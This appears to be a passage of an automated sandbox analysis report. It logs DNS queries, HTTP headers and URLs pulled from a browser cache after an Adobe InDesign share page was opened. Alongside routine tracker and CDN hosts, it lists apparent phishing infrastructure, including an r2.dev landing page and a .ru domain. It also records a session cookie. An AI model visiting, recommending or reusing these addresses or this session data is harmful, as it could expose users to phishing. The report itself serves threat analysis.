        Source: global trafficDNS traffic detected: DNS query: cdn0.capterra-static.com
        Source: global trafficDNS traffic detected: DNS query: c.lytics.io
        Source: global trafficDNS traffic detected: DNS query: q.quora.com
        Source: global trafficDNS traffic detected: DNS query: tracking.capterra.com
        Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
        Source: global trafficDNS traffic detected: DNS query: evantaagartnercompany.demdex.net
        Source: global trafficDNS traffic detected: DNS query: edge.fullstory.com
        Source: global trafficDNS traffic detected: DNS query: cm.everesttech.net
        Source: global trafficDNS traffic detected: DNS query: www.facebook.com
        Source: unknownHTTP traffic detected: POST /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=16315&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveContent-Length: 516sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: text/plainAccept: */*Origin: https://indd.adobe.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://indd.adobe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4a13c21de71e3a5f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 16:16:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsx-dns-prefetch-control: offexpect-ct: max-age=0x-frame-options: SAMEORIGINstrict-transport-security: max-age=15552000; includeSubDomainsx-download-options: noopenx-content-type-options: nosniffx-permitted-cross-domain-policies: nonereferrer-policy: no-referrerx-xss-protection: 0vary: Originaccess-control-allow-credentials: trueCache-Control: max-age=14400CF-Cache-Status: HITReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMcD8TIpgo1vLufL0eO%2FLbrmD%2F4y8myg1aFc5fyHOhEzqeqXQ8iwKgrJetqL1cToVrrkUgktt7Cy6v7otpWNf6VA35cycnyf1tkJVPcuEAHp9A%2BXOWTAhUga"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bb615468c600cb0-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 16:16:16 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 8bb615967e188cd4-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 16:16:23 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 8bb615c138628c17-EWR
        Source: chromecache_443.2.dr, chromecache_478.2.drString found in binary or memory: http://feross.org
        Source: chromecache_642.2.dr, chromecache_670.2.drString found in binary or memory: http://github.com/garycourt/murmurhash-js
        Source: chromecache_435.2.dr, chromecache_341.2.drString found in binary or memory: http://hammerjs.github.io/
        Source: chromecache_642.2.dr, chromecache_670.2.drString found in binary or memory: http://opensource.org/licenses/MIT
        Source: chromecache_642.2.dr, chromecache_670.2.drString found in binary or memory: http://sites.google.com/site/murmurhash/
        Source: chromecache_797.2.drString found in binary or memory: http://stackoverflow.com/questions/16092114/background-size-differs-in-internet-explorer)
        Source: chromecache_446.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735dac8
        Source: chromecache_446.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735dacd
        Source: chromecache_446.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735dad8
        Source: chromecache_446.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735dada
        Source: chromecache_733.2.dr, chromecache_403.2.drString found in binary or memory: http://underscorejs.org
        Source: chromecache_642.2.dr, chromecache_434.2.dr, chromecache_683.2.dr, chromecache_670.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: chromecache_642.2.dr, chromecache_670.2.drString found in binary or memory: http://www.lalit.org/lab/javascript-css-font-detect/
        Source: chromecache_398.2.dr, chromecache_622.2.drString found in binary or memory: https://a.quora.com/qevents.js
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://accounts.google.com/gsi/
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://accounts.google.com/gsi/button
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://accounts.google.com/gsi/fedcm.json
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://accounts.google.com/gsi/fedcmcsp?client_id=
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://accounts.google.com/gsi/iframe/select
        Source: chromecache_488.2.drString found in binary or memory: https://accounts.google.com/gsi/log
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://accounts.google.com/gsi/revoke
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://accounts.google.com/gsi/select
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://accounts.google.com/gsi/status
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://accounts.google.com/gsi/style
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://accounts.google.com/o/oauth2/iframe
        Source: chromecache_488.2.drString found in binary or memory: https://accounts.google.com/o/oauth2/v2/auth
        Source: chromecache_378.2.drString found in binary or memory: https://ad.doubleclick.net
        Source: chromecache_398.2.dr, chromecache_622.2.dr, chromecache_568.2.dr, chromecache_378.2.drString found in binary or memory: https://ade.googlesyndication.com
        Source: chromecache_378.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
        Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
        Source: chromecache_773.2.dr, chromecache_443.2.dr, chromecache_840.2.dr, chromecache_478.2.drString found in binary or memory: https://aws-amplify.github.io/docs/js/authentication#amplify-project-setup
        Source: chromecache_773.2.dr, chromecache_443.2.dr, chromecache_840.2.dr, chromecache_478.2.drString found in binary or memory: https://aws-amplify.github.io/docs/js/authentication#configure-your-app
        Source: chromecache_352.2.dr, chromecache_595.2.dr, chromecache_603.2.dr, chromecache_807.2.dr, chromecache_594.2.dr, chromecache_566.2.dr, chromecache_398.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_525.2.dr, chromecache_622.2.dr, chromecache_784.2.dr, chromecache_615.2.dr, chromecache_339.2.dr, chromecache_568.2.dr, chromecache_378.2.drString found in binary or memory: https://cct.google/taggy/agent.js
        Source: chromecache_429.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/
        Source: chromecache_429.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
        Source: chromecache_646.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
        Source: chromecache_646.2.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js
        Source: chromecache_429.2.drString found in binary or memory: https://code.jquery.com/jquery-3.5.1.slim.min.js
        Source: chromecache_398.2.dr, chromecache_622.2.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
        Source: chromecache_511.2.dr, chromecache_571.2.drString found in binary or memory: https://conversation.api.drift.com
        Source: chromecache_511.2.dr, chromecache_571.2.drString found in binary or memory: https://customer.api.drift.com
        Source: chromecache_317.2.drString found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#cross_origin)
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#display_moment
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#skipped_moment
        Source: chromecache_478.2.drString found in binary or memory: https://docs.amplify.aws/lib/troubleshooting/upgrading/q/platform/js)
        Source: chromecache_739.2.dr, chromecache_417.2.drString found in binary or memory: https://feross.org
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKK58VXh.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKy58Q.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu0-K4.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu6-K6h9Q.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u-w4BMUTPHjxsIPx-mPCLQ7A.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u-w4BMUTPHjxsIPx-oPCI.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHh30AUi-qJCY.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHh30AXC-q.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAUi-qJCY.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAXC-q.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh50XSwaPGR_p.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh50XSwiPGQ.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwiPGQ.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwaPGR_p.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwiPGQ.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wi_FQft1dw.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wi_Gwft.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_FQft1dw.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_Gwft.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_FQft1dw.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_Gwft.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjxAwXjeu.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0e0w8mIEDQ.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0e0x8mI.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0e0ycmIEDQ.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0e0ysmIEDQ.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0-ExdGM.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0aExdGM.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0yExdGM.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOydIRUdwzM.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOydIhUdwzM.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOydKxUdwzM.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOydLxUd.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0O6tLQ.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0OCtLQ0Z.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0OOtLQ0Z.woff2)
        Source: chromecache_437.2.drString found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0OqtLQ0Z.woff2)
        Source: chromecache_381.2.dr, chromecache_322.2.dr, chromecache_709.2.dr, chromecache_539.2.dr, chromecache_314.2.dr, chromecache_754.2.drString found in binary or memory: https://forms-as-a-service.capstage.net
        Source: chromecache_381.2.dr, chromecache_322.2.dr, chromecache_709.2.dr, chromecache_539.2.dr, chromecache_314.2.dr, chromecache_754.2.drString found in binary or memory: https://forms-as-a-service.capterra.com
        Source: chromecache_733.2.dr, chromecache_403.2.drString found in binary or memory: https://github.com/bkwld/tram
        Source: chromecache_807.2.dr, chromecache_398.2.dr, chromecache_525.2.dr, chromecache_622.2.drString found in binary or memory: https://github.com/krux/postscribe/blob/master/LICENSE.
        Source: chromecache_773.2.dr, chromecache_840.2.drString found in binary or memory: https://github.com/lancedikson/bowser
        Source: chromecache_558.2.dr, chromecache_371.2.drString found in binary or memory: https://github.com/microsoft/clarity
        Source: chromecache_339.2.drString found in binary or memory: https://google.com
        Source: chromecache_339.2.drString found in binary or memory: https://googleads.g.doubleclick.net
        Source: chromecache_713.2.drString found in binary or memory: https://img.pblc.it/i/300x0x8.f.DOST/x/created_in_publicate.png
        Source: chromecache_713.2.drString found in binary or memory: https://img.pblc.it/i/600x315x9.coords.DO.25
        Source: chromecache_408.2.dr, chromecache_591.2.drString found in binary or memory: https://itunes.apple.com/us/app/messenger/id454638411
        Source: chromecache_511.2.dr, chromecache_571.2.drString found in binary or memory: https://js.driftt.com
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://meet.google.com
        Source: chromecache_511.2.dr, chromecache_571.2.drString found in binary or memory: https://metrics.api.drift.com
        Source: chromecache_572.2.dr, chromecache_488.2.drString found in binary or memory: https://oauth2.googleapis.com/revoke
        Source: chromecache_446.2.drString found in binary or memory: https://p.typekit.net/p.css?s=1&k=urt5zuu&ht=tk&f=7180.7181.7182.7183&a=108349166&app=typekit&e=css
        Source: chromecache_378.2.drString found in binary or memory: https://pagead2.googlesyndication.com
        Source: chromecache_505.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204/?id=turtlex_join_ig&tx_jig=$
        Source: chromecache_352.2.dr, chromecache_595.2.dr, chromecache_603.2.dr, chromecache_807.2.dr, chromecache_594.2.dr, chromecache_566.2.dr, chromecache_398.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_525.2.dr, chromecache_622.2.dr, chromecache_784.2.dr, chromecache_615.2.dr, chromecache_339.2.dr, chromecache_568.2.dr, chromecache_378.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
        Source: chromecache_337.2.drString found in binary or memory: https://pblc.me/pub/40f029dddc28e3
        Source: chromecache_408.2.dr, chromecache_591.2.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.facebook.orca
        Source: chromecache_704.2.drString found in binary or memory: https://prod.adobeccstatic.com/License/LICENSE.txt
        Source: chromecache_713.2.drString found in binary or memory: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html
        Source: chromecache_713.2.drString found in binary or memory: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=pow
        Source: chromecache_505.2.drString found in binary or memory: https://publickeyservice.msmt.gcp.privacysandboxservices.com
        Source: chromecache_622.2.drString found in binary or memory: https://px.ads.linkedin.com/collect?
        Source: chromecache_622.2.drString found in binary or memory: https://q.quora.com/_/ad/
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#about
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#classic-cars
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#contact
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#electric-vehicles
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#faq
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#learn-more
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#modern-supercars
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#privacy
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#services
        Source: chromecache_429.2.drString found in binary or memory: https://quantumspirel.ru/#terms
        Source: chromecache_398.2.dr, chromecache_622.2.drString found in binary or memory: https://reveal.clearbit.com/v1/companies/reveal?authorization=
        Source: chromecache_318.2.dr, chromecache_569.2.drString found in binary or memory: https://sketch.com
        Source: chromecache_807.2.dr, chromecache_398.2.dr, chromecache_525.2.dr, chromecache_622.2.drString found in binary or memory: https://snap.licdn.com/li.lms-analytics/insight.min.js
        Source: chromecache_429.2.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
        Source: chromecache_807.2.dr, chromecache_525.2.drString found in binary or memory: https://static.hotjar.com/c/hotjar-
        Source: chromecache_495.2.dr, chromecache_448.2.drString found in binary or memory: https://static.woopra.com/js/w.js.LICENSE.txt
        Source: chromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_784.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
        Source: chromecache_542.2.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect
        Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.drString found in binary or memory: https://tagassistant.google.com/
        Source: chromecache_738.2.dr, chromecache_556.2.drString found in binary or memory: https://tailwindcss.com
        Source: chromecache_511.2.dr, chromecache_571.2.drString found in binary or memory: https://targeting.api.drift.com
        Source: chromecache_352.2.dr, chromecache_505.2.dr, chromecache_595.2.dr, chromecache_603.2.dr, chromecache_807.2.dr, chromecache_594.2.dr, chromecache_566.2.dr, chromecache_398.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_525.2.dr, chromecache_622.2.dr, chromecache_784.2.dr, chromecache_615.2.dr, chromecache_339.2.dr, chromecache_568.2.dr, chromecache_378.2.drString found in binary or memory: https://td.doubleclick.net
        Source: chromecache_505.2.drString found in binary or memory: https://td.doubleclick.net/td/bjs
        Source: chromecache_505.2.drString found in binary or memory: https://td.doubleclick.net/td/bts
        Source: chromecache_505.2.drString found in binary or memory: https://td.doubleclick.net/td/buyer.wasm
        Source: chromecache_505.2.drString found in binary or memory: https://td.doubleclick.net/td/update?ig_name=4s1810143887.1725034608
        Source: chromecache_505.2.drString found in binary or memory: https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=147036195015
        Source: chromecache_505.2.drString found in binary or memory: https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=147728964426
        Source: chromecache_398.2.dr, chromecache_622.2.drString found in binary or memory: https://unpkg.com/web-vitals/dist/web-vitals.iife.js
        Source: chromecache_434.2.dr, chromecache_683.2.drString found in binary or memory: https://use.typekit.net
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/650f2d/00000000000000007735dada/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/650f2d/00000000000000007735dada/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/650f2d/00000000000000007735dada/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_446.2.drString found in binary or memory: https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
        Source: chromecache_717.2.dr, chromecache_502.2.drString found in binary or memory: https://www.capterra.com
        Source: chromecache_798.2.dr, chromecache_813.2.drString found in binary or memory: https://www.capterra.com/legal/cookie-policy/
        Source: chromecache_317.2.drString found in binary or memory: https://www.cloudflare.com/favicon.ico
        Source: chromecache_819.2.dr, chromecache_815.2.drString found in binary or memory: https://www.fullstory.com/legal/terms-and-conditions/
        Source: chromecache_807.2.dr, chromecache_398.2.dr, chromecache_525.2.dr, chromecache_622.2.drString found in binary or memory: https://www.google-analytics.com/analytics.js
        Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.drString found in binary or memory: https://www.google-analytics.com/debug/bootstrap?id=
        Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
        Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.drString found in binary or memory: https://www.google.%/ads/ga-audiences
        Source: chromecache_378.2.drString found in binary or memory: https://www.google.com
        Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.drString found in binary or memory: https://www.google.com/ads/ga-audiences
        Source: chromecache_508.2.dr, chromecache_440.2.dr, chromecache_680.2.dr, chromecache_543.2.drString found in binary or memory: https://www.google.com/pagead/1p-user-list/1072635088/?random
        Source: chromecache_339.2.dr, chromecache_568.2.dr, chromecache_378.2.drString found in binary or memory: https://www.googleadservices.com
        Source: chromecache_378.2.drString found in binary or memory: https://www.googletagmanager.com
        Source: chromecache_398.2.dr, chromecache_622.2.dr, chromecache_615.2.dr, chromecache_339.2.drString found in binary or memory: https://www.googletagmanager.com/a?
        Source: chromecache_398.2.dr, chromecache_622.2.dr, chromecache_568.2.dr, chromecache_378.2.drString found in binary or memory: https://www.googletagmanager.com/dclk/ns/v1.js
        Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
        Source: chromecache_398.2.dr, chromecache_622.2.dr, chromecache_615.2.dr, chromecache_339.2.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
        Source: chromecache_408.2.dr, chromecache_591.2.drString found in binary or memory: https://www.internalfb.com/intern/invariant/
        Source: chromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_784.2.drString found in binary or memory: https://www.merchant-center-analytics.goog
        Source: chromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_398.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_622.2.dr, chromecache_784.2.drString found in binary or memory: https://www.youtube.com/iframe_api
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
        Source: unknownNetwork traffic detected: HTTP traffic on port 50417 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
